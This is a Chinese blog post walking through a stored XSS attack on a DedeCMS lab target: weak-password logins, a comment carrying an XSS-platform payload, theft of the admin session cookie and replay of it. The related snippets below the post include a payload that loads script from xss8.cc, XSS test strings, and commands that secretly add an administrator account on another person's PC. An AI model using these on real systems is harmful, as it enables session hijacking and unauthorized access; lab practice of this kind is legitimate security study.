存储型xss实例分享---基于web靶机的织梦内容管理系统

最新推荐文章于 2022-11-22 19:08:15 发布
最新推荐文章于 2022-11-22 19:08:15 发布
阅读量421 收藏
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107884773
版权

存储型xss实例分享—基于web靶机的织梦内容管理系统

存储型xss实例分享:
在这里插入图片描述
① 用御剑扫到管理员登录路径:
http://192.168.1.105:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php
在这里插入图片描述
② 打开如下:
在这里插入图片描述
③ 用xss平台(可以多试几个平台)
https://xss8.cc/xss.php?do=project&act=viewcode&ty=create&id=10604
在这里插入图片描述
④ 登录
会员账号/密码:like/123456
爆破管理员账号/密码:admin/admin
登录会员账号
在这里插入图片描述
⑤ 找一篇文字评论,将上面xss平台值插入
在这里插入图片描述
在这里插入图片描述
⑥ 管理员登录
在这里插入图片描述
⑦ 然后在xss平台获取到
location:http://192.168.1.105:800/dedecmsv5.6-gbkfinal/uploads/dede/feedback_main.php
cookie:PHPSESSID=55d632de642d3d5e3d3299d182dfa598
在这里插入图片描述
⑧ 然后用一个浏览器进行会员登录,替换cookie。
在这里插入图片描述
在这里插入图片描述
⑨ 替换掉cookie后,访问
http://192.168.1.105:800/DedeCmsV5.6-GBK-Final/uploads/dede/index.php
(XSS平台可以获取到)
刷新后,成功登录admin
在这里插入图片描述
在这里插入图片描述
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS获取管理员COOKIE
weixin_44940180的博客
08-08 1575
扫到管理员登录路径: http://192.168.3.83:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php 用xss平台 会员账号/密码:like/123456 爆破管理员账号/密码:admin/admin 登录会员账号 找一篇文字评论,等待管理员上线 管理员登录 然后在xss平台获取到cookie toplocation是返回的管理员页面 然后打开之前获取到的管理员登录页面 替换掉cookie后,访问 http://192.168.3.83
给你八分钟搞定dedeCMS(织梦内容管理系统)
abxlep7702的博客
05-16 303
第1分钟_dedeCMS概述 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历了二年多的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小门户的构建,当然也不乏有企业用户和学校等在使用本系统。...
信息安全工程实践笔记--Day1 信息收集&漏洞扫描
weixin_46447549的博客
11-22 1785
上课
XSS跨站测试代码大全
余韵悠扬
09-20 347
'>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a%0aalert(\"Vulnerable\").jsp %22%3csc
【封神台】cookie伪造目标权限
00勇士王子的博客
11-17 687
题目 解题过程 访问网站,是一个留言板 先用普通的xss测试一下 成功弹窗,说明地处存在xss漏洞 选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc) 原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo
xss绕过字符过滤_【渗透实例】记录一次XSS渗透过程
weixin_32493541的博客
01-04 885
0x01 找到存在XSS的位置没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。使用的XSS代码:<img src=1 onerror=alert(1)>0x02 构造XSS代码连接到XSS平台XSS平台给我们的XSS代码是这样的:</tExtArEa>'"><sCRiPt sRC=https...
EVE-NG使用手册学习
weixin_49834963的博客
01-16 5559
EVE-NG使用手册学习 初识 底层就是Ubuntu, 命令和文件格式一样 ​ 修改时间data -s,修改时区,NTP Server http://everbx.podzone.net/repo 有了 EVE-NG,网络工程师可以模拟 Cisco、H3C、Huawei、Juniper、PaloAlto、CheckPoint 等众多厂商的设备;系统工程师可以模拟 Linux、Windows、MacOS 等大量操作系统;虚拟化工程师可以模拟 VMware、Citrix、KVM、QEMU、Openstack、D
(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar
03-24
【标题】"(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar" 暴露了重要的网络安全问题,主要关注的是存储跨站脚本( Stored XSS)漏洞。这个标题暗示了该源码包在设计时存在一个关键的安全缺陷,...
xss-labs-master.rar
05-09
四、XSS-labs-master靶机实践 "XSS-labs-master"提供了丰富的实战场景,每个关卡设计了不同的XSS攻击方式,玩家需找出并利用漏洞,实现目标。通过解谜式的学习,可以锻炼寻找、构造和利用XSS的能力。在实践中,你...
YXcms-含有存储XSS漏洞的源码包
03-17
YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常发生在用户提交的数据被持久化存储在服务器上,并在后续请求中未经适当过滤或...
存储XSS灰盒测试-01
最新发布
09-15
存储XSS是一种常见的Web应用安全漏洞,它允许攻击者将恶意脚本存储在服务器上,然后在其他用户访问时触发恶意脚本,从而实现攻击。存储XSS的危害性非常高,因此需要进行严格的检测和防护。 在这个课程中,我们...
Python-基于PythonDjango的ADExchange管理系统
08-10
【Python-基于PythonDjango的ADExchange管理系统】 在IT领域,构建高效且功能丰富的Web应用程序是常见的需求。这里我们关注的是一个使用Python的Django框架开发的AD(Active Directory)和Exchange管理系统的实现。...
【学习笔记】WordPress 4.2.0-4.5.1 flashmediaelement.swf 反射 XSS
chualam的博客
11-01 163
实例 wordpress 4.5.1 如果是一般的flash xss 要做反编译swf 然后源码分析 如果是开源项目的 直接github就能找到 如何给flash文件传参 html中的embed标签中的flashvar变量 可以直接通过/.swf?a=xx&b=xx直接传参 swf的核心代码是.as文件 注意到里面有个关键函数externalinterface.call() 这个call其实就是调用js的函数(help.adobe.com看具体函数调用) 注意objectid等参数.
XSS盲打、绕过
0xcc'Blog
04-28 3517
#0x00:XSS盲打 尽可能地于一切可能的地方提交XSS语句,只要后台管理员看到某一条语句,此语句就能被执行。 可以再留言板上留下获取cookie的代码,只要管理员在后台看到,就能获取管理员的cookie。 #0x01:XSS绕过 通常有以下几种方法 0.前端限制——抓包重放/直接F12修改前端代码 1.大小写——<SCriPt>AleRt(test)</ScRipt&...
网络安全从入门到精通(第七章-2)存储XSS详解
划水的小白白
02-07 2030
本文内容: ~如何使用xss平台 ~存储xss挖掘 ~存储xss实战注意 每日一句: 安全的所有一切都是基于信任,而做安全的就是不信任一切, 对任何东西都不信任,任何地方都可能是你发挥的战场!
浅谈XSS
告白的博客
07-18 210
0x00 XSS原理及危害 1)XSS(跨站脚本攻击)原理:恶意攻击者在web页面中会插入一些恶意的script代码。 当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的 2)危害:窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户,钓鱼,源码读取,页面跳转,蠕虫攻击,获取密码,键盘记录,XSS爬虫,表单劫持等等等等 通常可能产生XSS跨站脚本的地方: 填写信息地方:数据交互地方可以测试xss(对方将输入信息显示
某次日常xss盲打
召唤大白的博客
03-09 284
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
【渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2362
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
简单入侵操作
永不垂头的博客
06-30 9783
学习笔记—简单入侵操作 趁别人不在的时间操作他人电脑 打开cmd 输入:net share c$=c:\(将他的磁盘共享出去,同时也要打开电脑上的允许远程操控权限) 然后ipconfig下,记录他的ip 写好.bat脚本。 net user admin 123456 /add net localgroup administrators admin /add shutdown -s -t 60 -c “这个年纪你睡得着觉?” 从本机cmd上输入net use k: \192.168.1.103\c$
存储XSS攻击:成因、挖掘与防御策略
存储XSS(跨站脚本攻击)是Web安全领域的一种常见漏洞类,它发生在用户的敏感数据在服务器端被恶意编码并持久地存储于数据库中,然后在后续的用户访问时被读取并执行。这种攻击形式的特点在于,攻击代码不是临时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值